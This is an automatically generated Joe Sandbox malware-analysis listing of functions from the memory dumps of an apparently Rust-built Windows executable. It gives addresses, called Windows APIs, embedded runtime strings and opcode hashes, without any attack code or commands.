Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff728770000_file.jbxd

Similarity

API ID: ErrorFormatHandleLastMessageModulememset
String ID: NTDLL.DLL$assertion failed: self.is_char_boundary(new_len)/rustc/9b00956e56009bab2aa15d7bff10916599e3d6d6\library\alloc\src\string.rs
API String ID: 1434010500-1267143961
Opcode ID: a2fdf3f50ade1514b8e8d220692a852cc6b1829e34b8d44ffabc660db15a48ab
Instruction ID: d53d2e9cc29889f5fb7fd97d0ba4ebc3a66d31672238ed29bf7a9191b6608c4b
Opcode Fuzzy Hash: a2fdf3f50ade1514b8e8d220692a852cc6b1829e34b8d44ffabc660db15a48ab
Instruction Fuzzy Hash: C4A1C532A49BC284E7719FA0DC407F8EA60FB58394F844137CA9D06BD9DF79A285DB14

Function 00007FF72878D5CC Relevance: 6.0, APIs: 4, Instructions: 39timethreadCOMMON

Download Yara Rule

APIs

GetSystemTimeAsFileTime.KERNEL32 ref: 00007FF72878D5F8
GetCurrentThreadId.KERNEL32 ref: 00007FF72878D606
GetCurrentProcessId.KERNEL32 ref: 00007FF72878D612
QueryPerformanceCounter.KERNEL32 ref: 00007FF72878D622

Memory Dump Source

Source File: 00000000.00000002.2228207286.00007FF728771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF728770000, based on PE: true

Associated: 00000000.00000002.2228160584.00007FF728770000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2228239553.00007FF728790000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2228797821.00007FF728B0B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2228817379.00007FF728B0C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff728770000_file.jbxd

Similarity

API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
String ID:
API String ID: 2933794660-0
Opcode ID: 294a0a96a0f81ae7afaf7b16e31fb50118d3dcf11c965d61aa8162dd32814fe9
Instruction ID: 390e8cbf0f0a865759ecbfc6606b53ff7f4d8218f1218ece74ac5de5d8941eef
Opcode Fuzzy Hash: 294a0a96a0f81ae7afaf7b16e31fb50118d3dcf11c965d61aa8162dd32814fe9
Instruction Fuzzy Hash: 83118C22B64B058AEB009FB0EC452A8B3A4FB1C758F840A36DA6D427A4EF78D1548750

Function 00007FF7287884A0 Relevance: 5.2, Strings: 4, Instructions: 159COMMON

Download Yara Rule

Strings

}, xrefs: 00007FF728788648
\u, xrefs: 00007FF7287886CE
0123456789abcdefBorrowMutErroralready borrowed: , xrefs: 00007FF728788521, 00007FF728788657
{, xrefs: 00007FF7287886C9

Memory Dump Source

Source File: 00000000.00000002.2228207286.00007FF728771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF728770000, based on PE: true

Associated: 00000000.00000002.2228160584.00007FF728770000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2228239553.00007FF728790000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2228797821.00007FF728B0B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2228817379.00007FF728B0C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff728770000_file.jbxd

Similarity

API ID:
String ID: 0123456789abcdefBorrowMutErroralready borrowed: $\u${$}
API String ID: 0-3106430205
Opcode ID: 668c33013664040ba518dc7ce19817bebfd1056e8c89eb43a39861d698a28efc
Instruction ID: fd15c1eb7c16749a173c56c4a725100721798d7d320ec6ae42ebc40f0809029f
Opcode Fuzzy Hash: 668c33013664040ba518dc7ce19817bebfd1056e8c89eb43a39861d698a28efc
Instruction Fuzzy Hash: 35517D5372C6D082D3219764AC4062EFE52DBDA340F48D266F6DA07BDACA3ED001DF25

Function 000001BB80983B50 Relevance: 5.0, Strings: 2, Instructions: 2502COMMON

Download Yara Rule

Strings

X&, xrefs: 000001BB80985F16
, xrefs: 000001BB809852B3

Memory Dump Source

Source File: 00000000.00000002.2227514021.000001BB80981000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001BB80981000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1bb80981000_file.jbxd

Similarity

API ID:
String ID: $X&
API String ID: 0-100112515
Opcode ID: a9503aaca9b58ebbdf8d4c13425dc132b67dfa860aa8f076a81decd7104407ab
Instruction ID: 5bf5588cf83f89886b78c10820086d46da24ec282aaf9dc9928248bd533ebcbd
Opcode Fuzzy Hash: a9503aaca9b58ebbdf8d4c13425dc132b67dfa860aa8f076a81decd7104407ab
Instruction Fuzzy Hash: 0243E47542DAC4C9F712DB2CFC8A7E4B7A4FB99380F445316D885966F2EBB45288C384

Function 00007FF728785F00 Relevance: 4.6, Strings: 3, Instructions: 837COMMON

Download Yara Rule

Strings

__ZN, xrefs: 00007FF72878623D
`fmt::Error`s should be impossible without a `fmt::Formatter`, xrefs: 00007FF728786B69
.llvm./rust/deps\rustc-demangle-0.1.23\src\lib.rs, xrefs: 00007FF728785F25

Memory Dump Source

Source File: 00000000.00000002.2228207286.00007FF728771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF728770000, based on PE: true

Associated: 00000000.00000002.2228160584.00007FF728770000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2228239553.00007FF728790000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2228797821.00007FF728B0B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2228817379.00007FF728B0C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff728770000_file.jbxd

Similarity

API ID:
String ID: .llvm./rust/deps\rustc-demangle-0.1.23\src\lib.rs$__ZN$`fmt::Error`s should be impossible without a `fmt::Formatter`
API String ID: 0-487299250
Opcode ID: 79fcf483fa33773ce691d94b235fc4f862f681df640f059c50c92a912db8ff91
Instruction ID: 46b43be9a39c966426a54455a08667584f351128e245beca8e0695186f9728b3
Opcode Fuzzy Hash: 79fcf483fa33773ce691d94b235fc4f862f681df640f059c50c92a912db8ff91
Instruction Fuzzy Hash: 2A626C62E4C59151E620A7909C083BEE751FB49394FC44237EAAD077C6DF3ED544EB28

Function 00007FF72877D4A0 Relevance: 4.6, APIs: 3, Instructions: 70filenativesynchronizationCOMMON

Download Yara Rule

APIs

NtWriteFile.NTDLL ref: 00007FF72877D51B
WaitForSingleObject.KERNEL32 ref: 00007FF72877D530
RtlNtStatusToDosError.NTDLL ref: 00007FF72877D557

Memory Dump Source

Source File: 00000000.00000002.2228207286.00007FF728771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF728770000, based on PE: true

Associated: 00000000.00000002.2228160584.00007FF728770000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2228239553.00007FF728790000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2228797821.00007FF728B0B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2228817379.00007FF728B0C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff728770000_file.jbxd

Similarity

API ID: ErrorFileObjectSingleStatusWaitWrite
String ID:
API String ID: 3447438843-0
Opcode ID: e2a69725430296ec90bba5f14898161efa67951fb34cc5b1c4e05999cb81cf97
Instruction ID: 4adbad9f238f5df9855f84570eded4904e3cc9bac9e93d1ce3f062024c402c65
Opcode Fuzzy Hash: e2a69725430296ec90bba5f14898161efa67951fb34cc5b1c4e05999cb81cf97
Instruction Fuzzy Hash: 7B316132A08BC182E760DB64F8507AAF3A1FB98354F908135E69D82B98DF7DD585CF00

Function 00007FF728781EF0 Relevance: 3.4, APIs: 1, Strings: 1, Instructions: 412COMMON

Download Yara Rule

APIs

memset.VCRUNTIME140 ref: 00007FF728781F16

Strings

punycode{-}0, xrefs: 00007FF72878243A

Memory Dump Source

Source File: 00000000.00000002.2228207286.00007FF728771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF728770000, based on PE: true

Associated: 00000000.00000002.2228160584.00007FF728770000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2228239553.00007FF728790000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2228797821.00007FF728B0B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2228817379.00007FF728B0C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff728770000_file.jbxd

Similarity

API ID: memset
String ID: punycode{-}0
API String ID: 2221118986-2450133883
Opcode ID: dfbd434eb1d611face5466c5bed115bbe311645db7e00bfd26a6144d3211caa2
Instruction ID: 3e0c16a7f9ca1a4f19cadc0d2cc99aaa24d1db7e6e579eabd38604420f1933e5
Opcode Fuzzy Hash: dfbd434eb1d611face5466c5bed115bbe311645db7e00bfd26a6144d3211caa2
Instruction Fuzzy Hash: 69E19A22FAC64142FA109B95EC04779E642EB6D7D5F848232DE5D037D4DE3EEC41AB24

Function 00007FF7287711B0 Relevance: 2.8, Strings: 2, Instructions: 280COMMON

Download Yara Rule

Strings

0x00010203040506070809101112131415161718192021222324252627282930313233343536373839404142434445464748495051525354555657585960616263646566676869707172737475767778798081828384858687888990919293949596979899, xrefs: 00007FF72878C085, 00007FF72878C135, 00007FF72878C1E0, 00007FF72878C290
from_str_radix_int: must lie in the range `[2, 36]` - found , xrefs: 00007FF72878C7D4

Memory Dump Source

Source File: 00000000.00000002.2228207286.00007FF728771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF728770000, based on PE: true

Associated: 00000000.00000002.2228160584.00007FF728770000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2228239553.00007FF728790000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2228797821.00007FF728B0B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2228817379.00007FF728B0C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff728770000_file.jbxd

Similarity

API ID:
String ID: 0x00010203040506070809101112131415161718192021222324252627282930313233343536373839404142434445464748495051525354555657585960616263646566676869707172737475767778798081828384858687888990919293949596979899$from_str_radix_int: must lie in the range `[2, 36]` - found
API String ID: 0-2226122506
Opcode ID: 72a713cf5a32874949547b86eb10e02b097d68aa69b7745b4fcf3705ff8252ee
Instruction ID: 08dee5cab040a8555c86d39228d08ad02584c432ee1bd9cc9465386a3a9bd3eb
Opcode Fuzzy Hash: 72a713cf5a32874949547b86eb10e02b097d68aa69b7745b4fcf3705ff8252ee
Instruction Fuzzy Hash: 26913522E1819581E369AB64BC147F9E361FB88344FC0513ADA8F43BD0DF2ED645DB68

Function 00007FF728771350 Relevance: 2.2, APIs: 1, Instructions: 903COMMON

Download Yara Rule

APIs

memset.VCRUNTIME140 ref: 00007FF72877138C

Memory Dump Source

Source File: 00000000.00000002.2228207286.00007FF728771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF728770000, based on PE: true

Associated: 00000000.00000002.2228160584.00007FF728770000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2228239553.00007FF728790000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2228797821.00007FF728B0B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2228817379.00007FF728B0C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff728770000_file.jbxd

Similarity

API ID: memset
String ID:
API String ID: 2221118986-0
Opcode ID: 1f4c41466cc6df515a87f760613ccb3ca0049bc07932047d7481ce43c1db1c99
Instruction ID: a0493a99a0b977365e73384df463780733848a52899cb4033caeb1676ea5851d
Opcode Fuzzy Hash: 1f4c41466cc6df515a87f760613ccb3ca0049bc07932047d7481ce43c1db1c99
Instruction Fuzzy Hash: 7E824962F5869245E3A09BA09C107BCEF61EB19394FC40233ED6D03BC9DE2AD466D774

Function 00007FF728778740 Relevance: 1.7, APIs: 1, Instructions: 458COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2228207286.00007FF728771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF728770000, based on PE: true

Associated: 00000000.00000002.2228160584.00007FF728770000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2228239553.00007FF728790000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2228797821.00007FF728B0B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2228817379.00007FF728B0C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff728770000_file.jbxd

Similarity

API ID: ErrorHandleLast
String ID:
API String ID: 2586478127-0
Opcode ID: 9341782d1dba5dca5234e11f472c47f37a0e1ff99b0679544f72d2fe044df327
Instruction ID: af2dd1e9305aac5eda464eed4b68ef17d0cd8bf9f00b3cc430c4748e9b874fc3
Opcode Fuzzy Hash: 9341782d1dba5dca5234e11f472c47f37a0e1ff99b0679544f72d2fe044df327
Instruction Fuzzy Hash: 31F1F162B59A4282FE14AB95EC00679E261FF187D4F848536DE1D07B84EF3EE451CB2C

Function 00007FF7287738E1 Relevance: 1.7, APIs: 1, Instructions: 452COMMON

Download Yara Rule

APIs

memmove.VCRUNTIME140 ref: 00007FF728773902

Memory Dump Source

Source File: 00000000.00000002.2228207286.00007FF728771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF728770000, based on PE: true

Associated: 00000000.00000002.2228160584.00007FF728770000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2228239553.00007FF728790000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2228797821.00007FF728B0B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2228817379.00007FF728B0C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff728770000_file.jbxd

Similarity

API ID: memmove
String ID:
API String ID: 2162964266-0
Opcode ID: cbdc7e5dc7798522b174867b53fafbef8ab12bb26503c776031c683909a68ccf
Instruction ID: 1f22b2b3f1754c237cb68150cc6da9c7a20ea10d7cef215ee5703ba17858fb80
Opcode Fuzzy Hash: cbdc7e5dc7798522b174867b53fafbef8ab12bb26503c776031c683909a68ccf
Instruction Fuzzy Hash: 5B12F6736582E08BE355CBA9DC44A7DBBB1E75D384FC68127EB8907781CA3AD500DB60

Function 00007FF72878AB90 Relevance: 1.6, Strings: 1, Instructions: 334COMMON

Download Yara Rule

Strings

from_str_radix_int: must lie in the range `[2, 36]` - found , xrefs: 00007FF72878AB98

Memory Dump Source

Source File: 00000000.00000002.2228207286.00007FF728771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF728770000, based on PE: true

Associated: 00000000.00000002.2228160584.00007FF728770000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2228239553.00007FF728790000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2228797821.00007FF728B0B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2228817379.00007FF728B0C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff728770000_file.jbxd

Similarity

API ID:
String ID: from_str_radix_int: must lie in the range `[2, 36]` - found
API String ID: 0-1882762191
Opcode ID: 460ba6645ae707744da542d059db03f4c51757b6cc5626f26ad615b6692aa300
Instruction ID: 47dfc18e6d48574aac775cc862d43371f2a883fdbde91d4d3b8842e9b2d26ead
Opcode Fuzzy Hash: 460ba6645ae707744da542d059db03f4c51757b6cc5626f26ad615b6692aa300
Instruction Fuzzy Hash: B8B1AE82E2D75602F62353795C016B5C900DF637A4E81D337FC7E71BE1EB2AE652A218

Function 00007FF72877D480 Relevance: 1.3, APIs: 1, Instructions: 28memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(?,?,00000000,?,00007FF72877B88E), ref: 00007FF72878E36B

Memory Dump Source

Source File: 00000000.00000002.2228207286.00007FF728771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF728770000, based on PE: true

Associated: 00000000.00000002.2228160584.00007FF728770000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2228239553.00007FF728790000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2228797821.00007FF728B0B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2228817379.00007FF728B0C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff728770000_file.jbxd

Similarity

API ID: HeapProcess
String ID:
API String ID: 54951025-0
Opcode ID: 28428828bad923571c30b861f45577c2f35768ba7fc3d210bc9edf6ae415edcb
Instruction ID: 41a687c10f48d2c18a712c8e51b090a3acd6d25ff91975345459b5ec68f34a9c
Opcode Fuzzy Hash: 28428828bad923571c30b861f45577c2f35768ba7fc3d210bc9edf6ae415edcb
Instruction Fuzzy Hash: 36F03716F9A90181E95967567C4057CD691DF8CBA0ED44436CD0D46360FE2D69C29B24

Function 00007FF728787580 Relevance: .5, Instructions: 518COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2228207286.00007FF728771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF728770000, based on PE: true

Associated: 00000000.00000002.2228160584.00007FF728770000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2228239553.00007FF728790000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2228797821.00007FF728B0B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2228817379.00007FF728B0C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff728770000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ad03831d6827479ebb28a3cefdf88df5135b88cfc4be81a9df0b0410040f847d
Instruction ID: 1cf9dbbd20f4c88eaa1123693560305e75d4665232d6a57467d7a2ee79595ae3
Opcode Fuzzy Hash: ad03831d6827479ebb28a3cefdf88df5135b88cfc4be81a9df0b0410040f847d
Instruction Fuzzy Hash: AC225A13E18BE145F71267789C026BDD710FF9E3D8F804336EEAA12B96CF3992419664

Function 00007FF728774167 Relevance: .4, Instructions: 403COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2228207286.00007FF728771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF728770000, based on PE: true

Associated: 00000000.00000002.2228160584.00007FF728770000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2228239553.00007FF728790000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2228797821.00007FF728B0B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2228817379.00007FF728B0C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff728770000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 32c2448ebe5a50def6f04e3c7e67afb044d3115d6d412b9f67dc801a094f2e23
Instruction ID: 0f4b9b3e62dc365335974c029f0991f2ab14a33ec8510c22ca4ba9fa799cc08b
Opcode Fuzzy Hash: 32c2448ebe5a50def6f04e3c7e67afb044d3115d6d412b9f67dc801a094f2e23
Instruction Fuzzy Hash: DFF1F8B39142F04BE394DF2E8C1426ABAE6F385381F85C23BEB4943395DA39C415DB55

Function 00007FF7287713F3 Relevance: .3, Instructions: 307COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2228207286.00007FF728771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF728770000, based on PE: true

Associated: 00000000.00000002.2228160584.00007FF728770000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2228239553.00007FF728790000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2228797821.00007FF728B0B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2228817379.00007FF728B0C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff728770000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8523f3c577c8977e713c9cf5d616fb9940ab0c18501afc26cfb7e2635d707df0
Instruction ID: 3a5d0f3f397891ee3b00472ed50ffbc17e8509d5af6b4d694c9dcf007c7274b1
Opcode Fuzzy Hash: 8523f3c577c8977e713c9cf5d616fb9940ab0c18501afc26cfb7e2635d707df0
Instruction Fuzzy Hash: 1FD12722B586D249E7609AA0CC103BDFF61E714798F854233DE6E07BD8DB3AC4A5C764

Function 00007FF7287713FA Relevance: .3, Instructions: 307COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2228207286.00007FF728771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF728770000, based on PE: true

Associated: 00000000.00000002.2228160584.00007FF728770000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2228239553.00007FF728790000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2228797821.00007FF728B0B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2228817379.00007FF728B0C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff728770000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1f5adfe35352926e57d6c1501e3f94ef3e08b4afb6c04930f220e50684487561
Instruction ID: d045bda7254a6b5f6dbb2f9467f7f2098cf7c2d083c73bb6e0c8baa284e7395a
Opcode Fuzzy Hash: 1f5adfe35352926e57d6c1501e3f94ef3e08b4afb6c04930f220e50684487561
Instruction Fuzzy Hash: CED12622B586D249E7609AA0CC103BDFF61E714798F854233DE6E07BD8DA3AC4A5C764

Function 00007FF728771401 Relevance: .3, Instructions: 307COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2228207286.00007FF728771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF728770000, based on PE: true

Associated: 00000000.00000002.2228160584.00007FF728770000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2228239553.00007FF728790000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2228797821.00007FF728B0B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2228817379.00007FF728B0C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff728770000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0bc17a72bb4d65a3daaa96ea6a5e78534a2d2091f77ff49f54086504c6cd7c04
Instruction ID: 55b94b8345f9716bf1dbfd21bd7e53c974c63fc33db06dd67b562861708b1fae
Opcode Fuzzy Hash: 0bc17a72bb4d65a3daaa96ea6a5e78534a2d2091f77ff49f54086504c6cd7c04
Instruction Fuzzy Hash: 20D12722B586D249E7609AA0CC103BDFF61E714798F854233DE6E07BD8DB3AC4A5C764

Function 00007FF728771408 Relevance: .3, Instructions: 306COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2228207286.00007FF728771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF728770000, based on PE: true

Associated: 00000000.00000002.2228160584.00007FF728770000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2228239553.00007FF728790000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2228797821.00007FF728B0B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2228817379.00007FF728B0C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff728770000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 41c2eed5ed49d8d8304f99a1a2baafa887ea0ec3a4d61a056b90c3e01f289024
Instruction ID: 6eae3fc7843dc6f0690d4f3c58b5467d74d23b401cb9c01dcc1d5073b85197eb
Opcode Fuzzy Hash: 41c2eed5ed49d8d8304f99a1a2baafa887ea0ec3a4d61a056b90c3e01f289024
Instruction Fuzzy Hash: 8CD12622B586D249E7609AA0CC103BDFF61E714798F854233DE6E07BD8DB3AC4A5C764

Function 00007FF7287747BA Relevance: .1, Instructions: 142COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2228207286.00007FF728771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF728770000, based on PE: true

Associated: 00000000.00000002.2228160584.00007FF728770000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2228239553.00007FF728790000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2228797821.00007FF728B0B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2228817379.00007FF728B0C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff728770000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1f79e8fad165e2b4da0af30f8301137aa012c4f85985be7609532e68ff664c8b
Instruction ID: 49245d8e96ab8ee927283379133d3b9ddf4b1961c9b245c9fd66d4bc7b1cf70e
Opcode Fuzzy Hash: 1f79e8fad165e2b4da0af30f8301137aa012c4f85985be7609532e68ff664c8b
Instruction Fuzzy Hash: 6061AEB39041918BE7119F5AD85007EFB62F39A750FCA4237D78A13390CA3DB561CB28

Function 00007FF728771DEC Relevance: .1, Instructions: 112COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2228207286.00007FF728771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF728770000, based on PE: true

Associated: 00000000.00000002.2228160584.00007FF728770000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2228239553.00007FF728790000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2228797821.00007FF728B0B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2228817379.00007FF728B0C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff728770000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5ce88e58a84799f193d4f806ce9da28b807984588694c007ab581a73cfeca41d
Instruction ID: 14fed299e9a428fe4c2c353f548bbdf899812c330d0b9cfd8b41b0862fc3bdd3
Opcode Fuzzy Hash: 5ce88e58a84799f193d4f806ce9da28b807984588694c007ab581a73cfeca41d
Instruction Fuzzy Hash: 2341D32274578185EB25DEA59D502B9E720E768BC8B449827CE5F0BB48EE39E185C324

Function 000001BB8028FE28 Relevance: .0, Instructions: 27COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2226259589.000001BB80000000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001BB80000000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1bb80000000_file.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 54093e43b9854a2d540d9dde3269946287902615532eb97d05431949d4969fe2
Instruction ID: fd9e870ac502411b762e4f495439ca00326b07b88585afd9cdad32c2116996d4
Opcode Fuzzy Hash: 54093e43b9854a2d540d9dde3269946287902615532eb97d05431949d4969fe2
Instruction Fuzzy Hash: BFF030352085159FDFA69F58C881EBA77E9EF0C754F444058FD05DB662D3B1ED209B80

Function 00007FF72878D894 Relevance: .0, Instructions: 2COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2228207286.00007FF728771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF728770000, based on PE: true

Associated: 00000000.00000002.2228160584.00007FF728770000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2228239553.00007FF728790000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2228797821.00007FF728B0B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2228817379.00007FF728B0C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff728770000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2021999db2c8c4ddaef31ec3c98eae8a67e0ddccc3b8229d5b680a674f500f36
Instruction ID: 03e0f6bb3b8d027702b6ba4cb6618c2fa08ff47f517a0d7805a836c3ab907c3f
Opcode Fuzzy Hash: 2021999db2c8c4ddaef31ec3c98eae8a67e0ddccc3b8229d5b680a674f500f36
Instruction Fuzzy Hash: 11A0012299980294EA44AB99AD91020E670FF58301B850072C05D462609E2EA644DB29

Function 00007FF728777C10 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 193COMMON

Download Yara Rule

APIs

SetLastError.KERNEL32 ref: 00007FF728777D4A
GetEnvironmentVariableW.KERNEL32 ref: 00007FF728777D5D
GetLastError.KERNEL32 ref: 00007FF728777D69
